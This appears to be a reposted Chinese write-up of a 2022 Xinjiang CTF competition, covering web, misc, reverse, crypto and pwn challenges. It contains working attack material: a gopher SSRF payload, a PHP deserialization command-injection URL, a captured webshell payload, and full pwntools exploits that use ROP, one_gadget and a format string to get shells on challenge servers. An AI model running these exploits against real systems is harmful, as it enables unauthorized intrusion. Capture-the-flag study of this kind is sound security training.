我的编程空间,编程开发者的网络收藏夹
学习永远不晚

2022年新疆天山固网杯网络安全技能竞赛wp

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

2022年新疆天山固网杯网络安全技能竞赛wp

2022年新疆天山固网杯网络安全技能竞赛

有些卷的比赛,没想到最后一秒能被反超…

签到

1-1

直接url解密
1-2
图片解密
winhex直接出

web

web1:盲注猜文件

import stringimport requestsurl="http://127.0.0.1/?g="strings=string.digits+string.ascii_letters+"{}"print(strings)#长度限制为四位already_know="DASCTF{"start="TF{"while True:    for i in strings:        payload=start+i        r=requests.get(url+payload)        if "not" not in r.text:            already_know+=i            print(already_know)            start=start[1:]+i

web2:ssrf

POST /?a=ls HTTP/1.1Host: 172.73.23.100Connection: closeReferer: dasctf.comContent-Type: application/x-www-form-urlencodedContent-Length: 11dasctf=flag

直接打就ok

http://43.138.39.179:20000/?url=gopher://172.73.23.100:80/_%2550%254f%2553%2554%2520%252f%253f%2561%253d%256c%2573%2520%2548%2554%2554%2550%252f%2531%252e%2531%250d%250a%2548%256f%2573%2574%253a%2520%2531%2537%2532%252e%2537%2533%252e%2532%2533%252e%2531%2530%2530%250d%250a%2543%256f%256e%256e%2565%2563%2574%2569%256f%256e%253a%2520%2563%256c%256f%2573%2565%250d%250a%2552%2565%2566%2565%2572%2565%2572%253a%2520%2564%2561%2573%2563%2574%2566%252e%2563%256f%256d%250d%250a%2543%256f%256e%2574%2565%256e%2574%252d%2554%2579%2570%2565%253a%2520%2561%2570%2570%256c%2569%2563%2561%2574%2569%256f%256e%252f%2578%252d%2577%2577%2577%252d%2566%256f%2572%256d%252d%2575%2572%256c%2565%256e%2563%256f%2564%2565%2564%250d%250a%2543%256f%256e%2574%2565%256e%2574%252d%254c%2565%256e%2567%2574%2568%253a%2520%2531%2531%250d%250a%250d%250a%2564%2561%2573%2563%2574%2566%253d%2566%256c%2561%2567

web3:

/hint.php?id=9223372036854661293&file=php://filter/read=convert.base64-encode/resource=index

读index源码

error_reporting(0);class Evil{    public $flag = 1;    public function __wakeup()    {        $this->flag = 0;    }    public function __destruct()    {        if($this->flag == 1)        {            echo("How you did it?");            $xux = file_get_contents($_GET['xux']);            create_function("",$xux);        }        else{            die("nonono");        }    }}$o = $_GET['o'];if(isset($o)){    unserialize($o);}

不能用cve绕
参照这个绕过__wakeup
https://bugs.php.net/bug.php?id=81151

/index.php?o=C%3A4%3A%22Evil%22%3A2%3A%7Bs%3A4%3A%22flag%22%3Bi%3A1%3B%7D&xux=data://text/plain,;}system("cat+/flag");/*

获得flag

misc

misc1
1.把png高度改一下就看到压缩包密码
2.解压出来那个改成.ppt

misc2

打开流量,发现chr流量特征,解密

@ini_set("display_errors","0");@set_time_limit(0);functionasenc($out){return@base64_encode($out);};functionasoutput(){$output=ob_get_contents();ob_end_clean();echo"5b3"."ed02";echo@asenc($output);echo"f46cf"."2253ac";}ob_start();try{$D=base64_decode(substr($_POST["vb00375a68a239"],2));$F=@opendir($D);if($F==NULL){echo("ERROR://PathNotFoundOrNoPermission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.$N;$T=@date("Y-m-dH:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="".$T."".@filesize($P)."".$E."";if(@is_dir($P))$M.=$N."/".$R;else$L.=$N.$R;}echo$M.$L;@closedir($F);};}catch(Exception$e){echo"ERROR://".$e->getMessage();};asoutput();die();

发现会对结果进行输出

echo"5b3"."ed02";echo@asenc($output);echo"f46cf"."2253ac";

去掉头尾进行部分解密,发现所有的都输出的目录

image-20220626145018466

直接解密最后几个,发现有读到a.txt。

image-20220626145229045

这里翻看了很久a.txt都没发现,发现在chr的末尾会读一串字符串,输出方式是把内容base64加密后,添加两位,上面解密的代码也有

$D=base64_decode(substr($_POST["vb00375a68a239"],2));

其中内容是把部分字符串写入到a.txt中。

image-20220626145454515

这里全部手工提取出来,发现每隔两个一个重复。写个脚本,直接解密,看到是base32编码,再解密是base64,再解密得到flag。这里直接写了个脚本

import base64data = []with open('./1.txt','r') as f:    for i in f.readlines():        data.append(base64.b64decode(str(i[2:])))flag = ''for i in range(0,len(data),2):    flag += str(data[i]).split(' ')[3]print(base64.b64decode(base64.b32decode(flag)))# KJCUMVCRGFJEOZL2JJWE2V2RGNMW2SLXJZLVCM2ONJWGUTLNJZVU2VCBPBHFIZDIJZVFSMCOIRSGQTKHKJVWMUJ5HU======

image-20220626145738470

逆向

RE1
简单的汇编代码

a=[97,56,47,56,53,99,53,100,97,100,99,97,98,99,53,101,56,50,55,50,48,53,55,98,96,55,56,55,55,48,52,98]for i in a:        print(chr(i+1),end='')

RE2

PEinM

不断调试跟踪到main函数

__int64 sub_40175D(){  int v0; // eax  __int64 v2[11]; // [rsp+20h] [rbp-70h] BYREF  int v3; // [rsp+78h] [rbp-18h]  int v4; // [rsp+7Ch] [rbp-14h]  __int64 v5; // [rsp+80h] [rbp-10h]  int j; // [rsp+88h] [rbp-8h]  int i; // [rsp+8Ch] [rbp-4h]  ((void (*)(void))unk_401970)();  v5 = ((__int64 (__fastcall *)(__int64))unk_402E70)(32i64);  ((void (__fastcall *)(char *))unk_402E60)(aPleaseInputThe);  ((void (__fastcall *)(void *, __int64))unk_402E58)(&unk_405017, v5);  v4 = ((__int64 (__fastcall *)(__int64))unk_402E48)(v5);  if ( (v4 & 7) != 0 )    v0 = v4 / 8 + 1;  else    v0 = v4 / 8;  v3 = v0;  for ( i = 0; i < dword_404098; ++i )  {    if ( i >= v3 )      v2[i] = 0i64;    else      ((void (__fastcall *)(__int64 *, __int64, __int64))unk_402E38)(&v2[i], v5 + 8 * i, 8i64);  }  sub_401560(v2, dword_404098, (__int64)&unk_404020);  for ( j = 0; j < v4; ++j )  {    if ( *((_BYTE *)v2 + j) != byte_4040A0[j] )    {      ((void (__fastcall *)(char *))unk_402E60)(aWrong);      break;    }  }  if ( j == v4 )    ((void (__fastcall *)(char *))unk_402E60)(aRight);  return 0i64;}

关键加密算法

unsigned __int64 __fastcall sub_401560(_QWORD *a1, int a2, __int64 a3){  unsigned __int64 *v3; // rax  unsigned __int64 *v4; // rax  unsigned __int64 result; // rax  __int64 v6; // [rsp+8h] [rbp-28h]  __int64 v7; // [rsp+10h] [rbp-20h]  unsigned __int64 i; // [rsp+18h] [rbp-18h]  unsigned __int64 v9; // [rsp+20h] [rbp-10h]  unsigned __int64 v10; // [rsp+28h] [rbp-8h]  v7 = 52 / a2 + 6;  v9 = 0i64;  v10 = a1[a2 - 1];  do  {    v9 += 2654436025i64;    v6 = (v9 >> 2) & 3;    for ( i = 0i64; i < a2 - 1; ++i )    {      v3 = &a1[i];      *v3 += ((a1[i + 1] ^ v9) + (v10 ^ *(_QWORD *)(8 * (v6 ^ i & 0xA) + a3))) ^ (((8i64 * a1[i + 1]) ^ (v10 >> 4))                        + ((a1[i + 1] >> 4) ^ (8 * v10)));      v10 = *v3;    }    v4 = &a1[a2 - 1];    *v4 += ((*a1 ^ v9) + (v10 ^ *(_QWORD *)(8 * (v6 ^ i & 0xA) + a3))) ^ (((8i64 * *a1) ^ (v10 >> 4))                + ((*a1 >> 4) ^ (8 * v10)));    result = *v4;    v10 = result;    --v7;  }  while ( v7 );  return result;}

对照这个加密算法写出解密算法

#include unsigned int len = 0xa;unsigned __int64 dt = 0x9E377AB9;unsigned int key[] = {82, 51, 118, 69, 114, 115, 51, 95, 49, 83, 95, 69, 97, 83, 121, 10};unsigned __int64 enc[] ={13642685598377058827, 5817412076662707594, 2331052441392477015, 15896464891326163138, 13746579725899033479, 3806052838733117805, 7464345494307851357, 15880875776179112847, 8981812132120094190, 462517800415764379};void de_xxtea(){    unsigned __int64 sum = 0x6cc6245f3;    do    {        unsigned char sum1 = (unsigned char)(sum >> 2)&3;        enc[len-1] -= ((key[(len-1)&0xa^sum1]^enc[len-2])+(enc[0]^sum)) ^ (((enc[0] << 3)^(enc[len-2]>>4))+((enc[len-2] << 3)^(enc[0]>>4)));        int i = len-2;        do        {            enc[i] -= ((key[i&0xa^sum1]^enc[i-1])+(enc[i+1]^sum)) ^ (((enc[i+1] << 3)^(enc[i-1]>>4))+((enc[i-1] << 3)^(enc[i+1]>>4)));            i--;         }while(i != 0);        enc[0] -= ((key[0&0xa^sum1]^enc[len-1])+(enc[1]^sum)) ^ (((enc[1] << 3)^(enc[len-1]>>4))+((enc[len-1] << 3)^(enc[1]>>4)));        sum -= dt;    }while(sum != 0);}int main(){    int i = 0;    de_xxtea();    for(i = 0; i < 0xa; i++)    {        printf("%lx, ", enc[i]);    }}

解密得到:5f4e7552, 6d334d5f, 455f5331, 0, 0, 0, 0, 0, 0, 0

小端序转化一下就是flag

RuN_Fil3_M3mOrY_1S_EaSy

密码:

一个简单的rsa

rssssa9

coppersmith解部分明文

from Crypto.Util.number import *n = 78143938921360185614860462235112355256968995028076215097413461371745388165946555700961349927305255136527151965763804585057604387898421720879593387223895933656350645970498558271551701970896688207206809537892771605339961799334047604053282371439410751334173463317244016213693285842193635136764938802757014669091m = 1906077032611187208365446696459387107800629785754941498024021333398862239730761050657886407994645536780849c = 50130000135496687335562420162077023127865865388254124043997590968769445787929013990729805222613912997653046528125102370938788632651827553831996692788561639714991297669155839231144254658035090111092408296896778962224040765239997700906745359526477039359317216610131441370663885646599680838617778727787254679678S.<x>=PolynomialRing(Zmod(n))f=x*2^350+mg=(f^3-c).monic()r=int(g.small_roots(X=2^128)[0])m=r*2^350+mm=long_to_bytes(m).decode()[:-20]flag='DASCTF{%s}'%massert len(flag)==40print(flag)

PWN

pwn1
先跑出随机数. 因为种子固定, 随机数序列不变, 一次次尝试就可以了
脚本:

#! /usr/bin/python2# coding=utf-8import sysfrom pwn import *import base64#context.log_level = 'debug'context(arch='amd64', os='linux')def Log(name):    log.success(name+' = '+hex(eval(name)))def Connect():    return remote("101.42.177.225", 54800)def Send(sh, n):    sh.recvuntil("our number")    sh.sendline(str(n))known = [83, 83, 90, 46, 1, 75, 41, 77, 96, 15]def Try(i):    sh = Connect()    for n in known:        Send(sh, n)    Send(sh, i)    sh.recvuntil("\n")    res = sh.recv(1)    sh.close()    if res=="f":        return False    else:        return Truewhile len(known)<10:    for i in range(100):        if Try(i):            known.append(i)            print("="*0x30+str(i))            breakprint(known)sh.interactive()

后续跑本地是发现libc个ubuntu20.04的一样
因此只需要让cqde(sz+0x10)+0x1E发生溢出变成小的数就可以溢出, 假设要让其变为0, 那么有

cqde(sz+0x10)+0x1E = 0cqde(sz+0x10) = -0x1E = 0xffffffffffffffe2 (补码转16进制)sz+0x10 = 0xFFFFFFe2sz = 0xFFFFFFD2 = -46 (16进制转补码)

后面就产生了栈溢出, 但是read(0, buf, sz)因为地址位置会直接被拒绝执行

后续经过测试发现没法让sz为正数, 本题实际是通过整数溢出控制rsp, read(0, msg, sz)是废的

令rsp在rbp上面, 把rsp迁移到name的缓冲区中间, 通过read(0, name, 0x30)控制栈, 就可以开启ROP了

通过puts(GOT)泄露函数地址, 找到libc

#! /usr/bin/python2# coding=utf-8import sysfrom pwn import *import base64context.log_level = 'debug'context(arch='amd64', os='linux')def Log(name):    log.success(name+' = '+hex(eval(name)))elf = ELF('./pwn')libc = ELF('./libc.so.6')known = [83, 83, 90, 46, 1, 75, 41, 77, 96, 15]if(len(sys.argv)==1):#local    cmd = ["./pwn"]    sh = process(cmd)else:#remtoe    sh = remote("101.42.177.225", 54800)def Send(sh, n):    sh.recvuntil("your number")    sh.sendline(str(n))for n in known:    Send(sh, n)def GDB():    gdb.attach(sh, '''    #break *0x400A59    break *0x400936    conti    ''')#GDB()sh.recvuntil("So, give me a size: ")sh.sendline(str(-0x40-0x10))rdi = 0x400b43 # pop rdi; ret;rsi = 0x400b41 # pop rsi; pop r15; ret; exp = flat(0)exp+= flat(rdi, elf.got['srand'], elf.plt['puts'])exp+= flat(0x400937)    # return to mainsh.recvuntil('Leave your name: \n')sh.send(exp)libc.address = u64(sh.recv(6)+'\x00'*2)-0x43bb0Log("libc.address")# main 2for n in known:    Send(sh, n)sh.recvuntil("So, give me a size: ")sh.sendline(str(-0x40-0x10))exp = flat(0)exp+= flat(libc.address+0x4F2C5)sh.recvuntil('Leave your name: \n')sh.send(exp)sh.interactive()'''0x4f2c5 execve("/bin/sh", rsp+0x40, environ)constraints:  rsp & 0xf == 0  rcx == NULL0x4f322 execve("/bin/sh", rsp+0x40, environ)constraints:  [rsp+0x40] == NULL0x10a38c execve("/bin/sh", rsp+0x70, environ)constraints:  [rsp+0x70] == NULL'''

pwn3

#coding:utf-8import sysfrom pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./shortcut'#context.arch='amd64'while True :# try :elf=ELF(elfelf)context.arch=elf.archgdb_text='''telescope $rebase(0x202040) 16b sprintf'''if len(sys.argv)==1 :clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')io=process(elfelf)gdb_open=1# io=process(['./'],env={'LD_PRELOAD':'./'})clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')io=remote('127.0.0.1',10000)gdb_open=0clibc.srand(clibc.time(0))libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def gdb_attach(io,a):if gdb_open==1 :gdb.attach(io,a)def choice(a):io.sendlineafter('Please tell me your choice:\n',str(a))def add(b):choice(1)io.sendafter('shortcut:',b)io.recvuntil('\n')io.sendline('1')def show():choice(2)def delete(a):choice(3)io.sendlineafter('shortcut:\n',str(a))add('%14$p')add('aaaa')add('aaaa')show()io.recvuntil('0x')elf_base=int(io.recv(12),16)-0x10dcsystem_addr=elf_base+elf.plt['system']delete(1)add('%80c'+p64(system_addr))# delete(0)# add('%48c'+'/bin/sh\x00')delete(0)add('%96c'+'/bin/sh\x00')choice(4)gdb_attach(io,gdb_text)pause()io.sendafter('shortcut:\n','/bin/sh\x00')# libc_base=u64(io.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__malloc_hook']-88-0x10# libc.address=libc_base# bin_sh_addr=libc.search('/bin/sh\x00').next()# system_addr=libc.sym['system']# free_hook_addr=libc.sym['__free_hook']success('elf_base:'+hex(elf_base))# success('heap_base:'+hex(heap_base))io.interactive()# except Exception as e:# io.close()# continue# else:# continue

西域大都护府,持续更新cfs靶场及一些实战文章,欢迎大家来关注谢谢,想玩靶场的请加入我们交流群!

来源地址:https://blog.csdn.net/onl_llo/article/details/125472562

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

2022年新疆天山固网杯网络安全技能竞赛wp

下载Word文档到电脑,方便收藏和打印~

下载Word文档

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录